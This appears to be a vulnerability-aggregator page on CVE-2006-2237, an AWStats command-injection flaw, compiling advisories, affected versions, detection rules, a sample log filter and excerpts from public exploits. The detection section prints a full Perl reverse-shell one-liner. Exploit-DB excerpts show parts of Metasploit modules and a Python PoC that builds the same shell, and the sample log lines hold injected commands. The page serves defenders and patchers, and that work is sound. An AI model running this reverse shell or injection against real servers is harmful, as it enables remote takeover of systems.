CVE-2006-2237
Published 2006-05-08
Priority P272 · medium · 5.1 (CVSS 2.0)
AV:N/AC:H/Au:N/C:P/I:P/A:P
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 58.36% (99.0th percentile)
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| awstats | awstats | — | — |
| awstats | awstats | — | — |
| awstats | awstats | >= 0 < 6.5-2 | 6.5-2 |
| awstats | awstats | >= 0 < 6.5-2 | 6.5-2 |
| awstats | awstats | >= 0 < 6.5-2 | 6.5-2 |
| awstats | awstats | >= 0 < 6.5-2 | 6.5-2 |
| debian | awstats | < awstats 6.5-2 (bookworm) | awstats 6.5-2 (bookworm) |
Detection & IOCs
Command: perl -e '$h="<host>";$p=<port>;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(fork()){exec "/bin/sh"; exit(0); };'
- Detect exploitation attempts by monitoring HTTP requests to awstats.pl containing shell metacharacters (pipe '|') in the 'migrate' CGI parameter, especially patterns matching |...|awstats*.txt
- Alert on HTTP GET requests to /cgi-bin/awstats.pl where the 'migrate' query parameter contains a pipe character followed by commands and ends with a pattern like awstats<digits>.<site>.txt
- Monitor for the distinctive User-Agent string '[BL4CK] Security' in HTTP requests, which is used by the public exploit PoC for this CVE
- Monitor for the Referer header value 'http://exploit.by.redsand.of.blacksecurity.org' in requests to awstats.pl, used by the public PoC exploit
- Detect check/probe requests where the migrate parameter contains 'cat /etc/hosts', used by the Metasploit module's check() function to fingerprint vulnerable targets
- Monitor for outbound Perl-based reverse shell connections (connect-back) from the web server process, particularly using Socket module with fork+exec /bin/sh pattern
- The vulnerability is only exploitable when AllowToUpdateStatsFromBrowser is enabled in the AWStats config; audit configurations and restrict access to the update functionality as a detection/hardening measure
- The vulnerability is only exploitable when AllowToUpdateStatsFromBrowser is enabled in the AWStats configuration file, which is a non-default setting. Installations that only build static pages are not affected.
- Static AWStats deployments (those not using the web-based update feature) are not vulnerable to this CVE.
- Affected versions are AWStats 6.4 and 6.5 only; the fix was introduced in 6.6 (Debian fixed in package version 6.5-2).
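The request-level checks listed above, combined into one filter, as an added example (not taken from any of the sources quoted on this page). It assumes Apache combined-format access logs; the sample lines, addresses and rule names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (addresses, config
# name and timestamps are made up for this example).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/May/2006:10:00:01 +0000] "GET /cgi-bin/awstats.pl?config=example&output=main HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/May/2006:10:02:13 +0000] "GET /cgi-bin/awstats.pl?migrate=%7Ccat%20/etc/hosts%7Cawstats052006.example.txt HTTP/1.1" 200 812 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [06/May/2006:10:05:40 +0000] "GET /cgi-bin/awstats.pl?migrate=%7Cid%7Cawstats052006.example.txt HTTP/1.0" 200 640 "http://exploit.by.redsand.of.blacksecurity.org" "[BL4CK] Security"',
]

LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
# Pipe, anything, pipe, then a name shaped like awstats<digits>.<site>.txt
MIGRATE_SHAPE = re.compile(r'\|.*\|awstats\d+\..+\.txt$', re.S)

def classify(line):
    """Return the names of the rules a single log line trips (empty if none)."""
    m = LOG_RE.search(line)
    if not m:
        return []
    url = urlsplit(m['target'])
    if not url.path.endswith('awstats.pl'):
        return []
    hits = []
    # parse_qs percent-decodes, so %7C and a literal '|' are treated alike.
    for value in parse_qs(url.query, keep_blank_values=True).get('migrate', []):
        if '|' in value:
            hits.append('pipe-in-migrate')
        if MIGRATE_SHAPE.search(value):
            hits.append('pipe-command-awstats-txt')
        if 'cat /etc/hosts' in value:
            hits.append('check-probe')
    if '[BL4CK] Security' in m['ua']:
        hits.append('poc-user-agent')
    if 'exploit.by.redsand.of.blacksecurity.org' in m['referer']:
        hits.append('poc-referer')
    return hits

def scan(lines):
    """Map line number (1-based) to tripped rules, skipping clean lines."""
    return {n: h for n, line in enumerate(lines, 1) if (h := classify(line))}

if __name__ == '__main__':
    for n, hits in scan(SAMPLE_LOG).items():
        print(n, ', '.join(hits))
```

The User-Agent and Referer rules only catch the unmodified public PoC; the pipe-in-migrate rule is the one tied to the flaw itself. Values that are percent-encoded more than once are decoded only one level here.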
CVSS provenance
nvd · v2.0 · 5.1 MEDIUM · AV:N/AC:H/Au:N/C:P/I:P/A:P
osv · 5.1 MEDIUM
vulncheck · 5.1 MEDIUM
vendor_debian · 5.1 MEDIUM
GHSA
GHSA-x4mq-2mhg-3c5x: The web interface for AWStats 6
ghsa_unreviewed·2022-05-01
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.
OSV
CVE-2006-2237: The web interface for AWStats 6
osv·2006-05-08·CVSS 5.1
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.
VulnCheck
awstats awstats Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2006·CVSS 5.1
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.
Affected: awstats awstats
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware
Ubuntu
awstats vulnerability
vendor_ubuntu·2006-05-23
AWStats did not properly sanitize the 'migrate' CGI parameter. If the
update of the stats via web front-end is allowed, a remote attacker
could execute arbitrary commands on the server with the privileges of
the AWStats server.
This does not affect AWStats installations which only build static
pages.
Instructions: In general, a standard system update will make all the necessary changes.
Debian
CVE-2006-2237: awstats - The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, ...
vendor_debian·2006·CVSS 5.1
The web interface for AWStats 6.4 and 6.5, when statistics updates are enabled, allows remote attackers to execute arbitrary code via shell metacharacters in the migrate parameter.
Scope: local
bookworm: resolved (fixed in 6.5-2)
bullseye: resolved (fixed in 6.5-2)
forky: resolved (fixed in 6.5-2)
sid: resolved (fixed in 6.5-2)
trixie: resolved (fixed in 6.5-2)
No detection rules found.
Exploit-DB
AWStats 6.4 < 6.5 - migrate Remote Command Execution (Metasploit)
exploitdb·2010-07-03
AWStats 6.4 'AWStats migrate Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
payloads are recommended with this module. The vulnerability is only
present when AllowToUpdateStatsFromBrowser is enabled in the AWstats
configuration file (non-default).
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9671 $',
'References' =>
[
['CVE', '2006-2237'],
['OSVDB', '25284'],
['BID', '17844'],
['URL', 'http://awstats.sourceforge.net/awstats_security_news.php'],
['URL', 'http://www.milw0rm.com/exploits/1755'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'Requ
Exploit-DB
Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow
exploitdb·2007-04-07·CVSS 7.6
CVE-2006-3747 [HIGH] Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow
---
#!/bin/sh
# Exploit for Apache mod_rewrite off-by-one(Win32).
#
# by axis
# http://www.ph4nt0m.org
# 2007-04-06
#
# Tested on Apache 2.0.58 (Win32)
# Windows2003 CN SP1
#
# Vulnerable Apache Versions:
# * 1.3 branch: >1.3.28 and 2.0.46 and 2.2.0 and
# 2006-08-20
# http://www.milw0rm.com/exploits/2237
#
#
#
# to successfully exploit the vuln,there are some conditions
# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html
#
#
# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat
#
# for more details about the vuln please see:
# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
#
#
# no opcodes needed under windows!
# it will directly run our s
Exploit-DB
AWStats 6.5 - 'migrate' Remote Shell Command Injection
exploitdb·2006-05-06
---
#!/usr/bin/env python
# http://secunia.com/advisories/19969/
# by [email protected]
# May 5, 2006 - HAPPY CINCO DE MAYO
# HAPPY BIRTHDAY DAD
# private plz
#
# redsand@jinxy ~/ $ nc -l -p 31337 -v
# listening on [any] 31337 ...
# connect to [65.99.197.147] from blacksecurity.org [65.99.197.147] 53377
# id
# uid=81(apache) gid=81(apache) groups=81(apache)
#
import sys, socket, base64
import urllib2, urlparse, urllib
# perl 1 line tcp connect-back code
# needs ip & port
cmd = 'perl -e \'$h="%s";$p=%r;use Socket;$sp=inet_aton($h);$sa=sockaddr_in($p,$sp);;socket(CLIENT,PF_INET,SOCK_STREAM,getprotobyname("tcp"));gethostbyname($h);connect(CLIENT,$sa);open(STDIN,">&CLIENT");open(STDOUT,">&CLIENT");open(STDERR,">&CLIENT");if(
Exploit-DB
AWStats 6.4 < 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)
exploitdb·2006-05-04
AWStats 6.4 'AWStats migrate Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
payloads are recommended with this module. The vulnerability is only
present when AllowToUpdateStatsFromBrowser is enabled in the AWstats
configuration file (non-default).
},
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2006-2237'],
['OSVDB', '25284'],
['BID', '17844'],
['URL', 'http://awstats.sourceforge.net/awstats_security_news.php'],
['URL', 'http://www.milw0rm.com/exploits/1755'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd
Metasploit
AWStats migrate Remote Command Execution
metasploit
This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based payloads are recommended with this module. The vulnerability is only present when AllowToUpdateStatsFromBrowser is enabled in the AWStats configuration file (non-default).
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Ruchna Nigam
Published: December 13, 2019
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
Bugzilla
CVE-2006-2237: awstats arbitrary code execution vulnerability
bugzilla·2006-05-06·CVSS 5.1
+++ This bug was initially created as a clone of Bug #190923 +++
awstats < 6.6 has reportedly an arbitrary code execution vulnerability, fixed in
upstream 6.6. No CVE id yet (I've mailed them), but here's more info:
http://www.vuxml.org/freebsd/2df297a2-dc74-11da-a22b-000c6ec775d9.html
Discussion:
Awstats 6.6 is still in beta and did not work for me (update gave "Use of
uninitialized value in substitution (s///) at ..."), so I backported the fix
from CVS instead (it's a two-liner).
FC-5 and FC-4 versions building, devel is updated to 6.6 and I'll keep it
updated when a new beta arrives.
---
It appears that this is not fixed; the problem is in the unsanitized "migrate"
query string parameter.
---
Fixed, see bug 190923 for
Bugzilla
CVE-2006-2237: awstats arbitrary code execution vulnerability
bugzilla·2006-05-06·CVSS 5.1
awstats < 6.6 has reportedly an arbitrary code execution vulnerability, fixed in
upstream 6.6. No CVE id yet (I've mailed them), but here's more info:
http://www.vuxml.org/freebsd/2df297a2-dc74-11da-a22b-000c6ec775d9.html
Discussion:
Awstats 6.6 is still in beta and did not work for me (update gave "Use of
uninitialized value in substitution (s///) at ..."), so I backported the fix
from CVS instead (it's a two-liner).
FC-5 and FC-4 versions building, devel is updated to 6.6 and I'll keep it
updated when a new beta arrives.
---
It appears that this is not fixed; the problem is in the unsanitized "migrate"
query string parameter.
---
OK, strangely the files in the 6.6 beta tarball are more recent than what I got
from CVS...
- http://awstats.sourceforge.net/awstats_security_news.php
- http://secunia.com/advisories/19969
- http://secunia.com/advisories/20170
- http://secunia.com/advisories/20186
- http://secunia.com/advisories/20496
- http://secunia.com/advisories/20710
- http://security.gentoo.org/glsa/glsa-200606-06.xml
- http://www.debian.org/security/2006/dsa-1058
- http://www.novell.com/linux/security/advisories/2006_33_awstats.html
- http://www.osreviews.net/reviews/comm/awstats
- http://www.osvdb.org/25284
- http://www.securityfocus.com/bid/17844
- http://www.vupen.com/english/advisories/2006/1678
- http://www.vuxml.org/freebsd/2df297a2-dc74-11da-a22b-000c6ec775d9.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/26287
- https://usn.ubuntu.com/285-1/